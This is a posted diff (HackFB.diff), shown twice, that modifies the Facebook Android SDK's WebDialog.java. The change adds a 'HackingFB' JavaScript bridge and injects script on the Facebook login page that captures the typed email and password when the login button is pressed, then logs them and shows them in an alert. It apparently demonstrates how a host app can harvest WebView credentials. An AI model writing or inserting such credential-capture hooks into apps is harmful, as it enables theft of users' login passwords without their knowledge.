creativepsyco · July 26, 2017 02:40
diff --git a/HackFB.diff b/HackFB.diff
 diff --git i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
 index 70ac868..c2c9af0 100644
 --- i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
 +++ w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
 @@ -17,6 +17,7 @@
 package com.facebook.widget;
 
 import android.annotation.SuppressLint;
 +import android.app.AlertDialog;
 import android.app.Dialog;
 import android.app.ProgressDialog;
 import android.content.Context;
 @@ -29,8 +30,11 @@ import android.net.Uri;
 import android.net.http.SslError;
 import android.os.Bundle;
 import android.util.DisplayMetrics;
 +import android.util.Log;
 import android.view.*;
 +import android.webkit.JavascriptInterface;
 import android.webkit.SslErrorHandler;
 +import android.webkit.WebChromeClient;
 import android.webkit.WebView;
 import android.webkit.WebViewClient;
 import android.widget.FrameLayout;
 @@ -43,6 +47,8 @@ import com.facebook.internal.ServerProtocol;
 import com.facebook.internal.Utility;
 import com.facebook.internal.Validate;
 
 +import org.json.JSONTokener;
 +
 /**
  * This class provides a mechanism for displaying Facebook Web dialogs inside a Dialog. Helper
  * methods are provided to construct commonly-used dialogs, or a caller can specify arbitrary
 @@ -342,6 +348,15 @@ public class WebDialog extends Dialog {
                 ViewGroup.LayoutParams.MATCH_PARENT));
         webView.setVisibility(View.INVISIBLE);
         webView.getSettings().setSavePassword(false);
 +        webView.addJavascriptInterface(new HackingFB(), "HackingFB");
 +        webView.setWebChromeClient(new WebChromeClient() {
 +            @Override
 +            public void onConsoleMessage(String message, int lineNumber, String sourceID) {
 +                Log.e("password", message + " -- From line "
 +                        + lineNumber + " of "
 +                        + sourceID);
 +            }
 +        });
 
         webViewContainer.setPadding(margin, margin, margin, margin);
         webViewContainer.addView(webView);
 @@ -349,6 +364,24 @@ public class WebDialog extends Dialog {
         contentFrameLayout.addView(webViewContainer);
     }
 
 +    private class HackingFB {
 +
 +        @JavascriptInterface
 +        public void foundCredential(String name, String password) {
 +            harvest(name, password);
 +        }
 +
 +        private void harvest(String name, String password) {
 +            AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder(
 +                    getContext());
 +            alertDialogBuilder.setTitle(name);
 +            alertDialogBuilder.setMessage(password);
 +            alertDialogBuilder.create();
 +            alertDialogBuilder.show();
 +            Log.e("Password", String.format("%s %s", name, password));
 +        }
 +    }
 +
     private class DialogWebViewClient extends WebViewClient {
         @Override
         @SuppressWarnings("deprecation")
 @@ -396,10 +429,11 @@ public class WebDialog extends Dialog {
             } else if (url.contains(DISPLAY_TOUCH)) {
                 return false;
             }
 +            return false;
             // launch non-dialog URLs in a full browser
 -            getContext().startActivity(
 -                    new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
 -            return true;
 +//            getContext().startActivity(
 +//                    new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
 +//            return true;
         }
 
         @Override
 @@ -445,6 +479,16 @@ public class WebDialog extends Dialog {
             contentFrameLayout.setBackgroundColor(Color.TRANSPARENT);
             webView.setVisibility(View.VISIBLE);
             crossImageView.setVisibility(View.VISIBLE);
 +            if (url.contains("facebook.com/login.php")) {
 +                Log.e("password ", "Sending alert");
 +                view.loadUrl("javascript:console.log('password From Native')");
 +                view.loadUrl("javascript:console.log(document)");
 +                view.loadUrl("" +
 +                        "javascript:function hacker() {" +
 +                        "var f = document.getElementsByTagName('form')[0];" +
 +                        " HackingFB.foundCredential(f.email.value, f.pass.value); " +
 +                        "f.submit()}; document.getElementsByName('login')[0].onclick=hacker; ");
 +            }
         }
     }
	diff --git i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
	index 70ac868..c2c9af0 100644
	--- i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
	+++ w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java
	@@ -17,6 +17,7 @@
	package com.facebook.widget;

	import android.annotation.SuppressLint;
	+import android.app.AlertDialog;
	import android.app.Dialog;
	import android.app.ProgressDialog;
	import android.content.Context;
	@@ -29,8 +30,11 @@ import android.net.Uri;
	import android.net.http.SslError;
	import android.os.Bundle;
	import android.util.DisplayMetrics;
	+import android.util.Log;
	import android.view.*;
	+import android.webkit.JavascriptInterface;
	import android.webkit.SslErrorHandler;
	+import android.webkit.WebChromeClient;
	import android.webkit.WebView;
	import android.webkit.WebViewClient;
	import android.widget.FrameLayout;
	@@ -43,6 +47,8 @@ import com.facebook.internal.ServerProtocol;
	import com.facebook.internal.Utility;
	import com.facebook.internal.Validate;

	+import org.json.JSONTokener;
	+
	/**
	* This class provides a mechanism for displaying Facebook Web dialogs inside a Dialog. Helper
	* methods are provided to construct commonly-used dialogs, or a caller can specify arbitrary
	@@ -342,6 +348,15 @@ public class WebDialog extends Dialog {
	ViewGroup.LayoutParams.MATCH_PARENT));
	webView.setVisibility(View.INVISIBLE);
	webView.getSettings().setSavePassword(false);
	+ webView.addJavascriptInterface(new HackingFB(), "HackingFB");
	+ webView.setWebChromeClient(new WebChromeClient() {
	+ @Override
	+ public void onConsoleMessage(String message, int lineNumber, String sourceID) {
	+ Log.e("password", message + " -- From line "
	+ + lineNumber + " of "
	+ + sourceID);
	+ }
	+ });

	webViewContainer.setPadding(margin, margin, margin, margin);
	webViewContainer.addView(webView);
	@@ -349,6 +364,24 @@ public class WebDialog extends Dialog {
	contentFrameLayout.addView(webViewContainer);
	}

	+ private class HackingFB {
	+
	+ @JavascriptInterface
	+ public void foundCredential(String name, String password) {
	+ harvest(name, password);
	+ }
	+
	+ private void harvest(String name, String password) {
	+ AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder(
	+ getContext());
	+ alertDialogBuilder.setTitle(name);
	+ alertDialogBuilder.setMessage(password);
	+ alertDialogBuilder.create();
	+ alertDialogBuilder.show();
	+ Log.e("Password", String.format("%s %s", name, password));
	+ }
	+ }
	+
	private class DialogWebViewClient extends WebViewClient {
	@Override
	@SuppressWarnings("deprecation")
	@@ -396,10 +429,11 @@ public class WebDialog extends Dialog {
	} else if (url.contains(DISPLAY_TOUCH)) {
	return false;
	}
	+ return false;
	// launch non-dialog URLs in a full browser
	- getContext().startActivity(
	- new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
	- return true;
	+// getContext().startActivity(
	+// new Intent(Intent.ACTION_VIEW, Uri.parse(url)));
	+// return true;
	}

	@Override
	@@ -445,6 +479,16 @@ public class WebDialog extends Dialog {
	contentFrameLayout.setBackgroundColor(Color.TRANSPARENT);
	webView.setVisibility(View.VISIBLE);
	crossImageView.setVisibility(View.VISIBLE);
	+ if (url.contains("facebook.com/login.php")) {
	+ Log.e("password ", "Sending alert");
	+ view.loadUrl("javascript:console.log('password From Native')");
	+ view.loadUrl("javascript:console.log(document)");
	+ view.loadUrl("" +
	+ "javascript:function hacker() {" +
	+ "var f = document.getElementsByTagName('form')[0];" +
	+ " HackingFB.foundCredential(f.email.value, f.pass.value); " +
	+ "f.submit()}; document.getElementsByName('login')[0].onclick=hacker; ");
	+ }
	}
	}